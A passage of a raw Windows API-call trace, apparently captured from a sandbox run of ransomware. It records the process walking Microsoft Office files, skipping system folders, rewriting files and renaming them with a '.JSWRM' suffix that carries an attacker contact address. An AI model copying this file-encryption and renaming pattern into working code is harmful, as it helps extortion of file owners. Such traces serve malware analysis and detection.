CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMSMDB32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMSMDB32.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.690] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x17d4481d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10860, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="EntityDataHandler.dll", cAlternateFileName="ENTITY~1.DLL")) returned 1 [0129.690] lstrcmpiW (lpString1="EntityDataHandler.dll", lpString2=".") returned 1 [0129.690] lstrcmpiW (lpString1="EntityDataHandler.dll", lpString2="..") returned 1 [0129.690] lstrcmpiW (lpString1="EntityDataHandler.dll", lpString2="...") returned 1 [0129.690] lstrcmpiW (lpString1="EntityDataHandler.dll", lpString2="windows") returned -1 [0129.690] lstrcmpiW (lpString1="EntityDataHandler.dll", lpString2="recovery") returned -1 [0129.690] lstrcmpiW (lpString1="EntityDataHandler.dll", lpString2="perflogs") returned -1 [0129.690] lstrcmpiW (lpString1="EntityDataHandler.dll", lpString2="documents and settings") returned 1 [0129.690] lstrcmpiW (lpString1="EntityDataHandler.dll", lpString2="$RECYCLE.BIN") returned 1 [0129.690] lstrcmpiW (lpString1="EntityDataHandler.dll", lpString2="system volume information") returned -1 [0129.690] lstrcmpiW (lpString1="EntityDataHandler.dll", lpString2="msocache") returned -1 [0129.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityDataHandler.dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0129.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityDataHandler.dll", cchWideChar=21, lpMultiByteStr=0x2410d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EntityDataHandler.dll", lpUsedDefaultChar=0x0) returned 21 [0129.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityDataHandler.dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0129.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityDataHandler.dll", cchWideChar=21, lpMultiByteStr=0x241290, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EntityDataHandler.dll", lpUsedDefaultChar=0x0) returned 21 [0129.690] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x17d4481d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50a60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="EntityPicker.dll", cAlternateFileName="ENTITY~2.DLL")) returned 1 [0129.690] lstrcmpiW (lpString1="EntityPicker.dll", lpString2=".") returned 1 [0129.690] lstrcmpiW (lpString1="EntityPicker.dll", lpString2="..") returned 1 [0129.690] lstrcmpiW (lpString1="EntityPicker.dll", lpString2="...") returned 1 [0129.690] lstrcmpiW (lpString1="EntityPicker.dll", lpString2="windows") returned -1 [0129.690] lstrcmpiW (lpString1="EntityPicker.dll", lpString2="recovery") returned -1 [0129.690] lstrcmpiW (lpString1="EntityPicker.dll", lpString2="perflogs") returned -1 [0129.690] lstrcmpiW (lpString1="EntityPicker.dll", lpString2="documents and settings") returned 1 [0129.690] lstrcmpiW (lpString1="EntityPicker.dll", lpString2="$RECYCLE.BIN") returned 1 [0129.690] lstrcmpiW (lpString1="EntityPicker.dll", lpString2="system volume information") returned -1 [0129.691] lstrcmpiW (lpString1="EntityPicker.dll", lpString2="msocache") returned -1 [0129.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityPicker.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityPicker.dll", cchWideChar=16, lpMultiByteStr=0x241128, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EntityPicker.dll", lpUsedDefaultChar=0x0) returned 16 [0129.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityPicker.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EntityPicker.dll", cchWideChar=16, lpMultiByteStr=0x241178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EntityPicker.dll", lpUsedDefaultChar=0x0) returned 16 [0129.691] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4cfbc75, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ac68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ENVELOPE.DLL", cAlternateFileName="")) returned 1 [0129.691] lstrcmpiW (lpString1="ENVELOPE.DLL", lpString2=".") returned 1 [0129.691] lstrcmpiW (lpString1="ENVELOPE.DLL", lpString2="..") returned 1 [0129.691] lstrcmpiW (lpString1="ENVELOPE.DLL", lpString2="...") returned 1 [0129.691] lstrcmpiW (lpString1="ENVELOPE.DLL", lpString2="windows") returned -1 [0129.691] lstrcmpiW (lpString1="ENVELOPE.DLL", lpString2="recovery") returned -1 [0129.691] lstrcmpiW (lpString1="ENVELOPE.DLL", lpString2="perflogs") returned -1 [0129.691] lstrcmpiW (lpString1="ENVELOPE.DLL", lpString2="documents and settings") returned 1 [0129.691] lstrcmpiW (lpString1="ENVELOPE.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.691] lstrcmpiW (lpString1="ENVELOPE.DLL", lpString2="system volume information") returned -1 [0129.691] lstrcmpiW (lpString1="ENVELOPE.DLL", lpString2="msocache") returned -1 [0129.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPE.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPE.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.691] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc2fe923e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd4264503, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd52eea7d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x20d8840, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="EXCEL.EXE", cAlternateFileName="")) returned 1 [0129.691] lstrcmpiW (lpString1="EXCEL.EXE", lpString2=".") returned 1 [0129.691] lstrcmpiW (lpString1="EXCEL.EXE", lpString2="..") returned 1 [0129.691] lstrcmpiW (lpString1="EXCEL.EXE", lpString2="...") returned 1 [0129.691] lstrcmpiW (lpString1="EXCEL.EXE", lpString2="windows") returned -1 [0129.691] lstrcmpiW (lpString1="EXCEL.EXE", lpString2="recovery") returned -1 [0129.691] lstrcmpiW (lpString1="EXCEL.EXE", lpString2="perflogs") returned -1 [0129.691] lstrcmpiW (lpString1="EXCEL.EXE", lpString2="documents and settings") returned 1 [0129.691] lstrcmpiW (lpString1="EXCEL.EXE", lpString2="$RECYCLE.BIN") returned 1 [0129.691] lstrcmpiW (lpString1="EXCEL.EXE", lpString2="system volume information") returned -1 [0129.692] lstrcmpiW (lpString1="EXCEL.EXE", lpString2="msocache") returned -1 [0129.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.EXE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.EXE", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL.EXE", lpUsedDefaultChar=0x0) returned 9 [0129.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.EXE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.EXE", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL.EXE", lpUsedDefaultChar=0x0) returned 9 [0129.692] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc54b7686, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc54b7686, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc54dd8eb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x61f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="excel.exe.manifest", cAlternateFileName="EXCELE~1.MAN")) returned 1 [0129.692] lstrcmpiW (lpString1="excel.exe.manifest", lpString2=".") returned 1 [0129.692] lstrcmpiW (lpString1="excel.exe.manifest", lpString2="..") returned 1 [0129.692] lstrcmpiW (lpString1="excel.exe.manifest", lpString2="...") returned 1 [0129.692] lstrcmpiW (lpString1="excel.exe.manifest", lpString2="windows") returned -1 [0129.692] lstrcmpiW (lpString1="excel.exe.manifest", lpString2="recovery") returned -1 [0129.692] lstrcmpiW (lpString1="excel.exe.manifest", lpString2="perflogs") returned -1 [0129.692] lstrcmpiW (lpString1="excel.exe.manifest", lpString2="documents and settings") returned 1 [0129.692] lstrcmpiW (lpString1="excel.exe.manifest", lpString2="$RECYCLE.BIN") returned 1 [0129.692] lstrcmpiW (lpString1="excel.exe.manifest", lpString2="system volume information") returned -1 [0129.692] lstrcmpiW (lpString1="excel.exe.manifest", lpString2="msocache") returned -1 [0129.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excel.exe.manifest", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0129.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excel.exe.manifest", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="excel.exe.manifest", lpUsedDefaultChar=0x0) returned 18 [0129.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excel.exe.manifest", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0129.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excel.exe.manifest", cchWideChar=18, lpMultiByteStr=0x2412b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="excel.exe.manifest", lpUsedDefaultChar=0x0) returned 18 [0129.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\excel.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\excel.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.693] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1567) returned 1 [0129.693] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.693] ReadFile (in: hFile=0x45c, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x610, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345ec04*=0x610, lpOverlapped=0x0) returned 1 [0129.696] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.696] WriteFile (in: hFile=0x45c, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345ec00*=0x610, lpOverlapped=0x0) returned 1 [0129.696] CloseHandle (hObject=0x45c) returned 1 [0129.696] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\excel.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\excel.exe.manifest"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\excel.exe.manifest.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\excel.exe.manifest.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.697] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x17d4481d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="EXCEL.VisualElementsManifest.xml", cAlternateFileName="EXCELV~1.XML")) returned 1 [0129.697] lstrcmpiW (lpString1="EXCEL.VisualElementsManifest.xml", lpString2=".") returned 1 [0129.697] lstrcmpiW (lpString1="EXCEL.VisualElementsManifest.xml", lpString2="..") returned 1 [0129.697] lstrcmpiW (lpString1="EXCEL.VisualElementsManifest.xml", lpString2="...") returned 1 [0129.697] lstrcmpiW (lpString1="EXCEL.VisualElementsManifest.xml", lpString2="windows") returned -1 [0129.697] lstrcmpiW (lpString1="EXCEL.VisualElementsManifest.xml", lpString2="recovery") returned -1 [0129.697] lstrcmpiW (lpString1="EXCEL.VisualElementsManifest.xml", lpString2="perflogs") returned -1 [0129.697] lstrcmpiW (lpString1="EXCEL.VisualElementsManifest.xml", lpString2="documents and settings") returned 1 [0129.697] lstrcmpiW (lpString1="EXCEL.VisualElementsManifest.xml", lpString2="$RECYCLE.BIN") returned 1 [0129.697] lstrcmpiW (lpString1="EXCEL.VisualElementsManifest.xml", lpString2="system volume information") returned -1 [0129.697] lstrcmpiW (lpString1="EXCEL.VisualElementsManifest.xml", lpString2="msocache") returned -1 [0129.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.VisualElementsManifest.xml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0129.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.VisualElementsManifest.xml", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 32 [0129.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.VisualElementsManifest.xml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0129.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL.VisualElementsManifest.xml", cchWideChar=32, lpMultiByteStr=0x22d0d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 32 [0129.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\excel.visualelementsmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.699] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=338) returned 1 [0129.699] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.699] ReadFile (in: hFile=0x45c, lpBuffer=0x21c578, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345ec04*=0x150, lpOverlapped=0x0) returned 1 [0129.700] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.700] WriteFile (in: hFile=0x45c, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345ec00*=0x150, lpOverlapped=0x0) returned 1 [0129.700] CloseHandle (hObject=0x45c) returned 1 [0129.700] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\excel.visualelementsmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.VisualElementsManifest.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\excel.visualelementsmanifest.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.701] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe1c8beb8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee3a0b07, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd8e49f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1cc72a0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="excelcnv.exe", cAlternateFileName="")) returned 1 [0129.701] lstrcmpiW (lpString1="excelcnv.exe", lpString2=".") returned 1 [0129.701] lstrcmpiW (lpString1="excelcnv.exe", lpString2="..") returned 1 [0129.701] lstrcmpiW (lpString1="excelcnv.exe", lpString2="...") returned 1 [0129.701] lstrcmpiW (lpString1="excelcnv.exe", lpString2="windows") returned -1 [0129.701] lstrcmpiW (lpString1="excelcnv.exe", lpString2="recovery") returned -1 [0129.701] lstrcmpiW (lpString1="excelcnv.exe", lpString2="perflogs") returned -1 [0129.701] lstrcmpiW (lpString1="excelcnv.exe", lpString2="documents and settings") returned 1 [0129.701] lstrcmpiW (lpString1="excelcnv.exe", lpString2="$RECYCLE.BIN") returned 1 [0129.701] lstrcmpiW (lpString1="excelcnv.exe", lpString2="system volume information") returned -1 [0129.701] lstrcmpiW (lpString1="excelcnv.exe", lpString2="msocache") returned -1 [0129.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnv.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnv.exe", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="excelcnv.exe", lpUsedDefaultChar=0x0) returned 12 [0129.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnv.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnv.exe", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="excelcnv.exe", lpUsedDefaultChar=0x0) returned 12 [0129.702] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe238cd90, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe238cd90, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe24be028, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x62c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="excelcnv.exe.manifest", cAlternateFileName="EXCELC~1.MAN")) returned 1 [0129.702] lstrcmpiW (lpString1="excelcnv.exe.manifest", lpString2=".") returned 1 [0129.702] lstrcmpiW (lpString1="excelcnv.exe.manifest", lpString2="..") returned 1 [0129.702] lstrcmpiW (lpString1="excelcnv.exe.manifest", lpString2="...") returned 1 [0129.702] lstrcmpiW (lpString1="excelcnv.exe.manifest", lpString2="windows") returned -1 [0129.702] lstrcmpiW (lpString1="excelcnv.exe.manifest", lpString2="recovery") returned -1 [0129.702] lstrcmpiW (lpString1="excelcnv.exe.manifest", lpString2="perflogs") returned -1 [0129.702] lstrcmpiW (lpString1="excelcnv.exe.manifest", lpString2="documents and settings") returned 1 [0129.702] lstrcmpiW (lpString1="excelcnv.exe.manifest", lpString2="$RECYCLE.BIN") returned 1 [0129.702] lstrcmpiW (lpString1="excelcnv.exe.manifest", lpString2="system volume information") returned -1 [0129.702] lstrcmpiW (lpString1="excelcnv.exe.manifest", lpString2="msocache") returned -1 [0129.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnv.exe.manifest", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0129.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnv.exe.manifest", cchWideChar=21, lpMultiByteStr=0x241308, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="excelcnv.exe.manifest", lpUsedDefaultChar=0x0) returned 21 [0129.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnv.exe.manifest", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0129.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnv.exe.manifest", cchWideChar=21, lpMultiByteStr=0x2412e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="excelcnv.exe.manifest", lpUsedDefaultChar=0x0) returned 21 [0129.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\excelcnv.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\excelcnv.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 